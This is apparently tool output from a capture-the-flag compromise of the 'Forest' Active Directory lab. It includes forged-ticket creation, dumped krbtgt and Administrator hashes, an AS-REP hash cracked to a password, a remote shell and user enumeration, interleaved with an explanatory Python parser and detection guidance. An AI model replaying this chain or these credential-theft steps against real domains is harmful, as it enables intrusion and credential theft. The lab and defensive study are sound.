[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for htb.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
[*] Cleaning up...
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Cleaning up...
INFO: Found AD domain: htb.local
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153
INFO: Found 31 users
INFO: Found 75 groups
INFO: Found 0 trusts
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir C:\Users\svc-alfresco\Desktop\user.txt
Directory: C:\Users\svc-alfresco\Desktop
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:04 DONE (2020-03-22 13:39) 0.2207g/s 901933p/s 901933c/s 901933C/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Name MemberOf PasswordLastSet LastLogon UAC
------------ ------------------------------------------------------ -------------------------- -------------------------- --------
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2020-03-26 23:40:39.044925 2020-03-26 20:23:12.568590 0x410200
$krb5asrep$23$svc-alfresco@HTB.LOCAL:b3267a6ae9aa9e65e8420f161d843772$586e8db69f3b75d97cec66be5659031ace5f68e7e475ff8a3ad0a691a465c0d1d3ed714381bfc535c3e31093c5d55da18a9414ffb5e845fd525ee6e2e75b74f1d40ac19fa54fc1d627ace3fb6c3ab22cc4220cbc32a85ce13752fcf38e47e770b4418a2b5e02b13e62bbd9608b7eaf83d13c0fe589b0b2a4cd4eb25056a3c6e20e713eea3cdf98c7269359ae66afa6b7a640f94c46b37270f43cecb7b52d84c45e44f2943ac89beb7113be8382d974ddb578ae7a0da696b501902a1536547d59f17363b27a6f6a886464bb8b8b2096fe046b1773edeafa016b9e2427cce1bc060df4a82e1510
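The two lines above carry the whole AS-REP roasting story: the UAC value 0x410200 on the svc-alfresco row decodes to NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH, and because the account does not require Kerberos pre-authentication, the KDC hands anyone an AS-REP encrypted under the account's RC4 key, which john then cracks to s3rvice. The following is an added example, not code from the gist or from Impacket/john: it decodes userAccountControl bits, picks out enabled accounts carrying DONT_REQ_PREAUTH from GetNPUsers-style rows, and splits the etype-23 `$krb5asrep$` string into the fields a cracker actually works on. The table rows for oldsvc and jdoe and the hash value are constructed for the example; only the svc-alfresco row comes from the output above.

```python
import re

# Subset of userAccountControl bits as documented by Microsoft for the attribute.
UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000010: "LOCKOUT",
    0x000020: "PASSWD_NOTREQD",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x040000: "SMARTCARD_REQUIRED",
    0x080000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
}
ACCOUNTDISABLE = 0x000002
DONT_REQ_PREAUTH = 0x400000


def decode_uac(uac: int) -> list:
    """Names of the set userAccountControl bits, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if uac & bit]


def is_asrep_roastable(uac: int) -> bool:
    """An enabled account with DONT_REQ_PREAUTH answers an AS-REQ from anyone,
    so its AS-REP enc-part (keyed from the password) can be cracked offline.
    A disabled account still carries the bit but the KDC will not issue for it."""
    return bool(uac & DONT_REQ_PREAUTH) and not (uac & ACCOUNTDISABLE)


def find_roastable(table: str) -> list:
    """Scan GetNPUsers-style rows: first token is the sAMAccountName, last token
    is the hex UAC. Header and separator rows have no 0x value and are skipped."""
    found = []
    for line in table.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[-1].startswith("0x"):
            continue
        if is_asrep_roastable(int(parts[-1], 16)):
            found.append(parts[0])
    return found


# john/hashcat layout for etype 23 only: $krb5asrep$23$user@REALM:checksum$cipher
# checksum = 16-byte HMAC-MD5 over the enc-part, cipher = RC4 ciphertext.
KRB5ASREP_RC4 = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:$]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<cipher>[0-9a-fA-F]+)$"
)


def parse_krb5asrep(hash_line: str) -> dict:
    """Split an etype-23 AS-REP hash string into its fields. Each candidate password
    is turned into the NT hash, then a per-message RC4 key; the cracker decrypts the
    cipher with it and checks the result against the checksum."""
    m = KRB5ASREP_RC4.match(hash_line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$23$ hash string")
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])
    if fields["etype"] != 23:
        raise ValueError("etype %d uses a different field layout" % fields["etype"])
    return fields


# Constructed sample: the svc-alfresco row is the real GetNPUsers output above;
# oldsvc (disabled, DONT_REQ_PREAUTH set) and jdoe (pre-auth required) are made up.
SAMPLE_TABLE = """\
Name MemberOf PasswordLastSet LastLogon UAC
------------ ------------------------------------------------------ -------------------------- -------------------------- --------
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2020-03-26 23:40:39.044925 2020-03-26 20:23:12.568590 0x410200
oldsvc CN=Users,DC=htb,DC=local 2019-01-01 00:00:00.000000 2019-01-01 00:00:00.000000 0x410202
jdoe CN=Users,DC=htb,DC=local 2020-01-01 00:00:00.000000 2020-01-01 00:00:00.000000 0x10200
"""

# Constructed hash string in the same layout as the one above; the hex is synthetic.
SAMPLE_HASH = "$krb5asrep$23$svc-alfresco@HTB.LOCAL:" + "b3" * 16 + "$" + "de" * 40

if __name__ == "__main__":
    print("0x410200 ->", decode_uac(0x410200))
    print("roastable:", find_roastable(SAMPLE_TABLE))
    print("hash fields:", {k: v for k, v in parse_krb5asrep(SAMPLE_HASH).items() if k != "cipher"})
```

The same bit drives the defensive check: an LDAP query for `(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))` (4194304 is 0x400000) lists every account the KDC will serve an AS-REP for without pre-authentication, and on the DC side each such request shows up as event 4768 with Pre-Authentication Type 0 and, for the crackable RC4 case above, Ticket Encryption Type 0x17.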
rpcclient $> queryusergroups 0x47b
group rid:[0x201] attr:[0x7]
group rid:[0x47c] attr:[0x7]
rpcclient $> querygroup 0x201
Group Name: Domain Users
Description: All domain users
Group Attribute:7
Num Members:30
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:HTB) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [-] HTB\: STATUS_ACCESS_DENIED
SMB 10.10.10.161 445 FOREST [+] Enumerated domain user(s)
SMB 10.10.10.161 445 FOREST htb.local\Administrator badpwdcount: 0 baddpwdtime: 2019-09-22 18:30:53.383284
SMB 10.10.10.161 445 FOREST htb.local\Guest badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 10.10.10.161 445 FOREST htb.local\DefaultAccount badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 10.10.10.161 445 FOREST htb.local\krbtgt badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 10.10.10.161 445 FOREST htb.local\$331000-VK4ADACQNUCA badpwdcount: 0 baddpwdtime: 1600-12-31 19:03